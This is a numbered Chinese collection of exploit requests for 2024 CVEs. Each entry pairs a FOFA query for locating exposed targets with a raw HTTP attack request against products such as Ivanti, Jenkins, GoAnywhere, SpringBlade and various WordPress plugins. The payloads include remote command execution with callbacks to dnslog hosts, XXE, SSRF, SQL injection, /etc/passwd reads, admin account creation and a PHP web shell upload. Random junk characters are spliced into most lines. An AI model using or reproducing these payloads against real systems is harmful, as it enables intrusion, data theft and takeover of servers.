98. SpiderFlow爬虫平台远程命令执行9 J& h& Z  K4 j; \; @+ r9 D' m
CVE-2024-0195, T: y; Q, Z; _  ]4 [
FOFA：app="SpiderFlow"7 a7 {3 Y" D0 E( h
POST /function/save HTTP/1.1
* A6 ~! i) ]: r9 QHost: 192.168.40.130:8088( V# u; ]. l4 n9 s! z4 T3 r. D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% b  y4 k% j7 _- o* ?+ }1 L2 JConnection: close
- t; `% n$ |/ E, k  z* d: U+ YContent-Length: 121+ j% j8 {9 r, f4 x7 p* G! _
Accept: */*2 k, p8 K" A# I) N# D
Accept-Encoding: gzip, deflate/ V6 ~1 ]1 d1 K  e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- O* s8 T2 `/ Y$ r! l2 _7 Y: UContent-Type: application/x-www-form-urlencoded; charset=UTF-80 r4 C$ w! l' e8 D7 M5 {" j3 ^0 ]
X-Requested-With: XMLHttpRequest3 @% {' p& Z/ f/ L2 H
& @/ p! c' C9 u2 i" m' Q; K* Y
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
4 r; g- J, k( \1 Q. a- D. d8 |7 d- q% i

4 \) c# i. W' v  P4 S$ s, S99. Ncast盈可视高清智能录播系统busiFacade RCE9 O- n- t& `* ^
CVE-2024-0305
, k. z. S+ R" s1 W) s3 m; Q! _FOFA：app="Ncast-产品" && title=="高清智能录播系统"3 J; i$ N0 |$ h. F/ j
POST /classes/common/busiFacade.php HTTP/1.1
. j2 w" t7 |: y9 |/ _4 qHost: 192.168.40.130:8080: C. f- J. _+ `" k, ^+ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' {- ?$ T+ _$ N" G" ]8 s  T/ K$ rConnection: close- p- H* X+ R3 a
Content-Length: 154- ~0 S5 j( r1 K, q+ W
Accept: */*
' l- e- B# k( m8 dAccept-Encoding: gzip, deflate+ w* q) l  R/ S# ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  O+ j6 G  R5 ]4 g2 E( W$ W3 z3 B
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
3 t, r* Y+ L" a9 JX-Requested-With: XMLHttpRequest
- V, ?. r% l- E3 p9 _
6 N& }* i. l5 J: @4 c( S%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
) ]" H$ I6 K! y$ Y$ J8 }4 a: ^' Q5 V% f4 {4 k5 q3 S/ A
6 c& F0 u. z8 C9 W/ W8 ]
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传' o; [5 A: j; [( `% H5 X5 ~
CVE-2024-0352
* Y# p  N5 h, Q. R# LFOFA：icon_hash="874152924"
8 L9 N5 ~7 L; i$ |POST /api/file/formimage HTTP/1.13 X6 J4 o1 d6 r$ [
Host: 192.168.40.1308 |$ x+ i" h% A* M1 m' {1 H2 H7 P- F
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
$ W' }3 X& `: g6 G) h2 zConnection: close
0 J6 N6 Z6 B2 N3 \! O& \) Z* x. rContent-Length: 201
- W" G5 {3 Y: B. v' w- C" r- gContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
: k  C% r# y! fAccept-Encoding: gzip0 V& q; z+ O# z* _( R7 ^7 [! B

; {8 J* c$ M( L7 n' O" X------WebKitFormBoundarygcflwtei
0 U1 Q: j5 n: o' jContent-Disposition: form-data; name="file";filename="IE4MGP.php"( T7 O. b" t7 y4 c4 x  [: e
Content-Type: application/x-php
2 I5 r, L" [( j. F; W
2ayyhRXiAsKXL8olvF5s4qqyI2O$ I4 }8 E  k: a$ [+ s
------WebKitFormBoundarygcflwtei--1 c6 g" n4 U* @3 t
" P6 C. a! n- }" c5 Q- A8 Y: L# h. y. q

/ o$ G7 H5 P5 J$ K% F$ }- P101. ivanti policy secure-22.6命令注入
: E" M1 B% {, ACVE-2024-21887! o/ t+ s8 ^  `" A2 p( b6 `
FOFA：body="welcome.cgi?p=logo"
2 R9 Q' w2 S' O2 r- [1 tGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1: L- G5 ]+ d3 {% u7 q
Host: x.x.x.xx.x.x.x
5 _9 [) |. S' x( Z% L) K: UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 ]. g$ K7 [+ G9 W/ H
Connection: close
, Q% c- |1 A. F+ NAccept-Encoding: gzip3 L8 x. ]# ^/ i% \6 `9 P& F3 A

+ N0 L* A5 d; u) P* b% P3 k! i2 M- R. a' n( w. g. e
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
+ S( C, q: T; b: @9 [CVE-2024-21893
1 g7 n: |/ U3 fFOFA：body="welcome.cgi?p=logo"
/ i9 |. g2 R) PPOST /dana-ws/saml20.ws HTTP/1.1
0 g! \1 c8 F# r( m! yHost: x.x.x.x! {8 Q: H4 u, F4 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36! H* s2 W3 L2 j3 u
Connection: close
3 f, m( q/ A" q7 I: }Content-Length: 792
, }" Z3 k3 I" j& J/ v% OAccept-Encoding: gzip
( E, U2 O/ }& F- b! e- F4 ?( m! k2 u1 g7 Z' r0 \$ p7 E
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>          <ds:Signature          xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                <ds:SignedInfo>                      <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                      <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                   </ds:SignedInfo>                      <<ds:SignatureValue>qwerty</ds:SignatureValue>                   <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                      <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                </ds:KeyInfo>                <ds:Object></ds:Object>       </ds:Signature> </soap:Body></soap:Envelope>6 q: {: j/ g* M/ `6 a6 N

) y' q5 j, v9 X  f  D103. Ivanti Pulse Connect Secure VPN XXE
7 g7 W3 X+ c8 W' W: T& K5 TCVE-2024-220240 b3 g/ X7 L+ k. r& Q: g
FOFA：body="welcome.cgi?p=logo"+ n- w/ h/ T5 Q% O4 `
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
: T8 m+ E9 w* s  |7 T3 yHost: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36& f- }. B8 E; G9 {( r" z0 ]# d
Connection: close
2 y/ m2 R5 c$ i( Z9 q8 Z2 q, oContent-Length: 204
7 r' q! n  G3 W* U5 G  n( ]Content-Type: application/x-www-form-urlencoded
' w" L" Q: l- H- qAccept-Encoding: gzip
; N& }9 q$ c1 Y3 Z! b* H- E
5 M6 |  k7 f  J- J# ~2 P+ f+ rSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
3 \: z# ?5 `" s; T' D
! c3 M5 N6 J4 T. p5 e' G& R* e0 _' a! x, ~( k2 x
其中SAMLRequest的值是xml文件内容的base64值，xml文件如下1 g: N* e* o* m1 ?. g5 C0 F
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>! _! Z, Z" \. k0 J, e2 \+ V

7 x* ]' s: l4 q+ Z- {( I: f1 o" }8 e7 B; _
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
* i# t/ E4 O% Q- ]1 A1 z1 e0 CCVE-2024-0569
7 V. \5 l  h* v* s2 w' ^FOFA：title="TOTOLINK"
5 Z! J; h- s# M; qPOST /cgi-bin/cstecgi.cgi HTTP/1.1
" a* y% I1 W7 t+ eHost:192.168.0.1* L' E) [8 T# z! h4 G8 |) ~: Y
Content-Length:41+ o$ W1 V4 p6 X. D6 ?) a- P
Accept:application/json,text/javascript，*/*;q=0.01
( m& D3 ^* s/ [7 G; C' fX-Requested-with: XMLHttpRequest
! h4 n" F0 h5 v0 Y0 n3 W. x: {User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36. ~% d0 A1 M3 f. C& @! a
Content-Type: application/x-www-form-urlencoded:charset=UTF-82 j) ~8 v2 l8 R
Origin: http://192.168.0.10 M! ?- p$ y' m" `/ A) O
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
) L" \4 o7 a9 `8 g1 o2 ^Accept-Encoding:gzip,deflate  y8 L2 _+ {, G' w! K/ ~
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
4 Q0 Y5 {# F9 t7 k0 FConnection:close
3 w2 \# E$ A; s4 c1 Z  g; P, C* T( q- O% f  j4 Q
{4 v# ~/ O. H! }5 Z9 M) u% {' O9 l8 T
"topicurl":"getSysStatusCfg",9 K: Y7 F' G" o7 L; @3 y* m) o
"token":""
: i1 f- f! }: g8 `9 N6 ?}* p* Z. J0 U9 X' x! Z3 |. |

$ `7 P% A  I1 X) p0 h& j4 j7 R105. SpringBlade v3.2.0 export-user SQL 注入: m5 k4 w/ y/ ^, U: P
FOFA：body="https://bladex.vip"' j2 n! j9 ^% n# O) Q
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1) B8 q9 {7 ~; }' k

2 B4 q. M; A. r# z106. SpringBlade dict-biz/list SQL 注入& s, g, a9 v! D. {
FOFA：body="Saber 将不能正常工作"4 I, f6 K+ u8 s* L5 z0 n& L6 O
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
: N5 i% U( U5 g) h- ^Host: your-ip
0 f1 [5 B, x& s6 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! V0 i' `# S4 \Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A! O1 `, M; \) Z6 M- R" k( z$ D2 P
Accept-Encoding: gzip, deflate. L7 X1 E. g% w
Accept-Language: zh-CN,zh;q=0.9
  t) C! w. E/ ^5 wConnection: close! N3 e# y% }5 P, r. G/ y" Z

0 s+ K4 _- w' n4 j/ r! F+ V: c; g3 c) n% N  d  H) {
107. SpringBlade tenant/list SQL 注入! h! B' {. }6 V+ ?. s, ^, O. t2 R
FOFA：body="https://bladex.vip"
+ _! B5 `/ Z  VGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
3 K' C# z) N1 ~4 w' wHost: your-ip% M) X1 b! }' A) \$ j1 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& Z1 R. Z" G# B0 I- w1 eBlade-Auth:替换为自己的6 ^3 |: u% f; X2 {4 U/ ]
Connection: close
  r) P; s; n" v& U$ }: V
+ O$ K8 ^# @; j' j: @; F6 U7 V% K+ k+ n1 N% I8 ?3 R
108. D-Tale 3.9.0 SSRF
  R, o2 I- i- X% ~CVE-2024-21642
5 m/ ?8 b! z9 h% x  F0 PFOFA："dtale/static/images/favicon.png"
7 n2 l4 M5 S* ZGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
: g3 p7 S0 M+ }; }. `! ]! W/ KHost: your-ip
# [' Q) f- x; K( M5 }% fAccept: application/json, text/plain, */*/ v8 K* `5 e: d- W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.369 X! A7 c) n; V5 a2 O. Q9 ?/ _+ \
Accept-Encoding: gzip, deflate
& ~8 d) [* y8 t0 w2 V/ W* a, `Accept-Language: zh-CN,zh;q=0.9,en;q=0.8! ]# ]- h" h( j& n
Connection: close/ k/ p. Q2 x) x* F* w) I) T2 r: g7 Y
7 y) O) p1 N3 {

$ ~0 v* i& f$ m$ M- e' g3 x109. Jenkins CLI 任意文件读取: e6 K+ e6 v) X+ [8 E8 [' R8 z7 [. ~
CVE-2024-23897
5 A- T; }9 H8 n+ J5 qFOFA：header="X-Jenkins". w; L8 g4 Y: U, v
POST /cli?remoting=false HTTP/1.1
3 g5 P! X, T- n; \) z# n* |Host:% d1 |4 j& A$ _. n
Content-type: application/octet-stream
) ]5 v# Z3 z9 k0 Z8 vSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92( N; F6 ^' y: m) a2 ^3 ~
Side: upload
, E1 C7 F% V' _$ s/ k, ZConnection: keep-alive
+ W( `, r2 }3 ^3 U, GContent-Length: 163
* [, Z0 n% ?1 A" I! I$ B* W" n9 {) g: p5 j9 ]: M/ C0 N
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
: N1 }& }# N3 `& H" q: l4 R
8 w: u* ~$ I, k) g  y: R5 k  j. F$ I4 D
POST /cli?remoting=false HTTP/1.1
& D) {% z$ o% v& T) A1 EHost:  \  Q. Z" f" u
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92" c$ g* T8 J, f$ X
download
; D4 `# C& n+ _* y% i8 cContent-Type: application/x-www-form-urlencoded2 G$ }  M- K! H# R- M
Content-Length: 0
' q6 Q" ~5 W$ m9 g2 a  O
8 v; t, w$ |* ~# K( f* I8 h
) u. L/ z3 _0 B8 ^: mERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
' j* u% N: }! Z/ A" s5 H$ Kjava -jar jenkins-cli.jar help: z: B9 A$ g7 u( G. G
[COMMAND]6 u# U/ M+ k, |) s7 \8 `- |
Lists all the available commands or a detailed description of single command.
7 B0 {* q: [/ ^8 Y% s COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
+ f* j3 M* K7 L- t# {+ W+ ~$ r' y5 O: K8 u4 h' d
- b* n5 ~7 M! P  `( I1 i- B
110. Goanywhere MFT 未授权创建管理员; w$ V2 I: G4 f* \- C4 `
CVE-2024-0204
1 f+ c" l0 r# U. c) m; E6 cFOFA：body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932") h4 W; g2 y0 I
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1' C9 \/ b# r0 E  B+ e8 ^
Host: 192.168.40.130:8000
) ]  c+ _- y2 k( o) ^/ ^( z7 cUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36* ~7 ?8 ?! m1 x% w. o
Connection: close
! Q! v! o9 V( C- V, t/ PAccept: */*2 O/ Y7 {2 E, F: r
Accept-Language: en
( k& B# n1 `2 Q& V7 }4 g* ?Accept-Encoding: gzip; t6 I" u0 ?* p5 s3 @) z, [

# J' p, o9 @' |& X4 f) c0 _$ I9 \) ?& Q6 t
111. WordPress Plugin HTML5 Video Player SQL注入
7 u$ F4 c2 }8 m9 v/ nCVE-2024-1061
* m, c$ d0 W. z5 t+ L0 F! GFOFA："wordpress" && body="html5-video-player"
' E: `: Q8 p( R; c- VGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
# Y, ?$ l, ~. G( W7 S5 t# L8 _3 i6 xHost: 192.168.40.130:112
' O: ], f  O1 I6 Z, _% HUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
6 J- L2 i. n! \% @Connection: close
6 g2 x- f5 [9 R  w1 x. {# ~Accept: */*
; C- M( O6 v# |Accept-Language: en
2 G! g& A9 R" {% sAccept-Encoding: gzip. f8 T& D5 R0 I8 F( w# Q$ \
1 n4 m: y& y2 ~* G
# o  k0 L5 Y' ]' h/ l& S2 l2 f2 E
112. WordPress Plugin NotificationX SQL 注入
, L8 [9 C) h0 A5 n% jCVE-2024-1698
/ y6 L/ |- |/ w, C0 ^FOFA：body="/wp-content/plugins/notificationx"' L0 y8 X4 J4 ~& `6 a$ c
POST /wp-json/notificationx/v1/analytics HTTP/1.1
  x" ], P3 U" {3 N% R: {Host: {{Hostname}}
* |# w4 ?8 c; W+ q- qContent-Type: application/json
5 z* u" p& H2 p
# {" X' t8 j6 x, C- j- e{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}! i: J. ~5 G( {# K$ a

- T/ G8 b8 W7 P( h) k- P! |1 X  L
113. WordPress Automatic 插件任意文件下载和SSRF
7 G3 m1 S4 _4 LCVE-2024-279545 S$ c' }5 M! P" O
FOFA："/wp-content/plugins/wp-automatic"
8 M$ h, o/ R9 y8 dGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.12 q; n2 P3 y& t( d
Host: x.x.x.x. e" e$ G9 M5 b$ \& [9 R
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
: L! O# S: L# w. {9 fConnection: close! `. m* c, C2 @+ l* c+ s; e3 c" o: ?
Accept: */*" V3 H5 @* B2 Q
Accept-Language: en
7 J5 a- N; [# K9 x8 P  S( U# }Accept-Encoding: gzip: E: y/ ~- a8 I7 U& n4 \; y' |
' O' a! y# z1 C
6 e+ c* {% b1 K4 T; }0 _
114. WordPress MasterStudy LMS插件 SQL注入
# Z! X7 K5 ^9 T+ F  d; ], lFOFA：body="wp-content/plugins/masterstudy-lms-learning-management-system/"
5 X& g$ L8 D. @8 g' X1 eGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1+ _; K, k" U/ `" _4 Q5 K
Host: your-ip
- N- W' a6 u' X  G" KUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
0 \# [3 S! W, a$ f- y: J! dAccept-Charset: utf-80 b5 I; W2 _# G3 D
Accept-Encoding: gzip, deflate  d8 W5 Z5 ^) G* M
Connection: close# o% \* X: R! c5 F5 |8 \

: f! t1 U9 C* }+ @/ m# ]6 P: r1 m4 u$ ?: @  l* k# L0 ~2 |
115. WordPress Bricks Builder <= 1.9.6 RCE9 C3 ~( P7 @5 j$ Z$ z3 N" \+ G
CVE-2024-25600
% g( r: Y1 L# o& n1 jFOFA: body="/wp-content/themes/bricks/"+ N! v' {5 B0 V' x7 N" _
第一步，获取网站的nonce值1 L  }5 g. y% F) t3 W( z" c
GET / HTTP/1.1
3 R  Q9 }' h2 I& t+ LHost: x.x.x.x
" o5 T+ H' q2 a8 pUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.368 N! z3 z* r# w! L, a$ J
Connection: close
( O) G1 O, I; m: ZAccept-Encoding: gzip3 C+ u3 ]8 |- E3 Z7 z* B, T/ H
+ W0 n' P: Q- x' _3 U

; a" D* ?2 W; w$ I. R. a. ^. {第二步替换nonce值，执行命令/ ~; r% w" a( \. r. p
POST /wp-json/bricks/v1/render_element HTTP/1.1" f4 d2 k& ?1 i
Host: x.x.x.x# y* ]+ R0 ~' F) `7 u( R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36. ~" G) L# t3 ?9 J  ~) J
Connection: close, H! H$ ^0 e! O; G6 D6 p. J5 j
Content-Length: 356" a( G' R9 n+ u+ z% m/ p
Content-Type: application/json
& ^1 \0 e9 c( P$ n9 V7 PAccept-Encoding: gzip" D* q% s/ q: b+ g2 _
/ W7 l5 ^! Y3 g# b2 `6 D' ~
{6 C3 G% w! d7 q" K
"postId": "1"," ]6 v2 o( m" E
  "nonce": "第一步获得的值",+ {' E( Y, Z' B
  "element": {
! A7 e( m! a) C. s "name": "container",
3 J) H/ x# ]4 g2 t& g "settings": {1 y8 g. y) I( r2 |6 [, t
   "hasLoop": "true",
8 y1 ^% V% W7 X: P9 k* I7 i    "query": {4 a) `. I/ J; T; E# B- K" x
      "useQueryEditor": true,
7 ^0 N% V: |  }3 \) f& W* t       "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
$ J6 `7 O, }; O0 x# D- x  [$ `" b7 B       "objectType": "post"; c- P# z5 G$ e
   }
+ L, {) ~/ C3 `5 O* R }
! t0 _$ X$ G4 W! w: Z3 o1 K1 L  }' @) b' H  @# T1 h
}
! p: q$ l) g5 V9 W. I3 t
$ M4 d! T9 j7 F9 S8 g9 r$ F  _' |4 e$ H# x' Z9 _% u7 P+ N
116. wordpress js-support-ticket文件上传
! [# j/ |1 X( `" i( E+ s2 nFOFA：body="wp-content/plugins/js-support-ticket"
. ?# E5 f: |, ^5 I( X# c2 sPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
+ Z, ~0 K) J& ~! X% Z- }Host:
" L$ y, a- s. V" P4 X" C: mContent-Type: multipart/form-data; boundary=--------7670991715 k& ^) z6 r1 H/ b0 F0 X
User-Agent: Mozilla/5.0
* y5 X9 Z! D$ d: l5 F  Q: M* A- S  R. P7 V
----------767099171& o: m1 d6 ?- C' P
Content-Disposition: form-data; name="action"
/ x$ q( j! ~( `2 _$ H) f% Nconfiguration_saveconfiguration" ]0 O6 Q) v" e: R
----------767099171
+ d* h1 k: C2 H& x5 z! ]0 XContent-Disposition: form-data; name="form_request"
  [7 m! r' r; x' D3 Kjssupportticket
! T  e7 M0 X7 `----------767099171. a7 i+ d  j" U9 b( n6 M# @3 s' g% R
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
/ N& V6 @4 h7 o: x$ L$ hContent-Type: image/png* {' M7 ?5 j  _, H: W+ ~
----------767099171--" _! {8 D& ~1 [
" \/ W% f% @4 s$ Z

% y$ E9 F" f$ L7 ?117. WordPress LayerSlider插件SQL注入6 |$ `$ I/ w$ j: @0 g' w# u5 s
version：7.9.11 – 7.10.0
& P' D2 V: A- T8 l' `- HFOFA：body="/wp-content/plugins/LayerSlider/"
. C1 D; a4 W  iGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.11 q1 h# J* ?# `4 X5 i0 U
Host: your-ip
! ~, ?' @0 w5 G# ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( Y! u2 {; u: }0 ?4 E6 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( G& B- {# I- ?5 E6 m; p! x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 D% s( I: o! ?$ H! }' |
Accept-Encoding: gzip, deflate, br
0 R, i( `. c% O, }Connection: close
: q" h8 N" k5 g, z- h2 jUpgrade-Insecure-Requests: 1
, ^' d1 ?" S! T+ J! D- C& I, a, K. y0 Y) U1 C1 x
, I9 ^. ^- _( x. ?6 M
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传: r7 g( z3 P" W3 w% m8 @# t
CVE-2024-0939
2 x' G3 o4 i) v) p  @1 M' AFOFA：title="Smart管理平台"
& d% C3 `3 ~' ]1 C1 sPOST /Tool/uploadfile.php? HTTP/1.11 Y$ R9 C( F) t( A
Host: 192.168.40.130:8443; L  B: p5 Q: {; C
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
' I# W: M2 ~+ g2 t0 U) O$ d0 Q8 `' aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0/ R, O, U* ~. n9 K/ C  N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" w, ?" O+ _1 X! dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 m3 s6 V1 T8 u* Y6 q
Accept-Encoding: gzip, deflate4 k* H, F% V  h
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887% g. V# J. y6 X' ?4 r, i7 l" P
Content-Length: 405
* n  I2 H3 N& Z$ ~3 X/ |" YOrigin: https://192.168.40.130:8443
4 w2 j3 c1 ~3 HReferer: https://192.168.40.130:8443/Tool/uploadfile.php/ {$ h/ Q0 T' x1 T
Upgrade-Insecure-Requests: 1" y2 k  `& D: U
Sec-Fetch-Dest: document
! C( N+ e% U  W. Q( I* fSec-Fetch-Mode: navigate# `/ x2 c% U6 s, i
Sec-Fetch-Site: same-origin
4 Y/ H5 _$ v4 Y# a4 q7 B4 DSec-Fetch-User: ?1
0 ]; Z. K0 \' T' u5 Y7 l- C/ ]Te: trailers
( P( o$ J8 _4 w5 ]2 cConnection: close
5 I/ M5 A+ i6 `1 j% v. t, m
8 m6 a( {2 @  n. U' ~9 I2 w( z-----------------------------13979701222747646634037182887% S5 S8 D3 w1 r" y
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
+ u0 \+ e2 {$ {( B+ w. VContent-Type: application/octet-stream5 e8 m$ d+ N, y. U7 C3 b! R
$ l3 Q1 O% f" d9 O8 k
<?php9 b4 R$ Q% d. H, P
system($_POST["passwd"]);
6 S- B9 x+ v0 F7 J4 g+ U* [' A" {- a$ ^?>$ s2 t- I7 m! B6 [  a
-----------------------------13979701222747646634037182887( Y" G0 Q0 V7 c; J: \3 n
Content-Disposition: form-data; name="txt_path"( d" W7 h; L: I% H! c; v( v

6 P+ _5 b1 M7 B6 }0 ~/home/src.php: b% s0 V6 w. T# A) @0 Q
-----------------------------13979701222747646634037182887--
& I- S2 ]: d! L% D- w9 Z" n" L4 o( z7 X: a+ n3 M) l

* d% C% X+ C; {: @" [0 T7 Q访问/home/src.php# Q. m1 }$ |  w6 c/ A4 @3 f" U

) Q$ S5 }$ C# V1 f7 T; t2 C4 y119. 北京百绰智能S20后台sysmanageajax.php sql注入; l; C$ C, j  k
CVE-2024-1254
& y- E: p: g- ~3 C1 d; IFOFA：title="Smart管理平台"& [) O% s, }! V5 P3 H* z* C
先登录进入系统，默认账号密码为admin/admin
/ Q/ @) c' |- o1 lPOST /sysmanage/sysmanageajax.php HTTP/1.115 s8 p& L% a4 y4 P  ^8 M9 W5 G
Host: x.x.x.x8 r; e7 o% {+ v% l9 ~
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
4 R0 c; _6 i1 H" X) PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0) h: Q5 n4 @$ @; o; ^4 O
Accept: */*1 N5 N' ]) v& i) e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
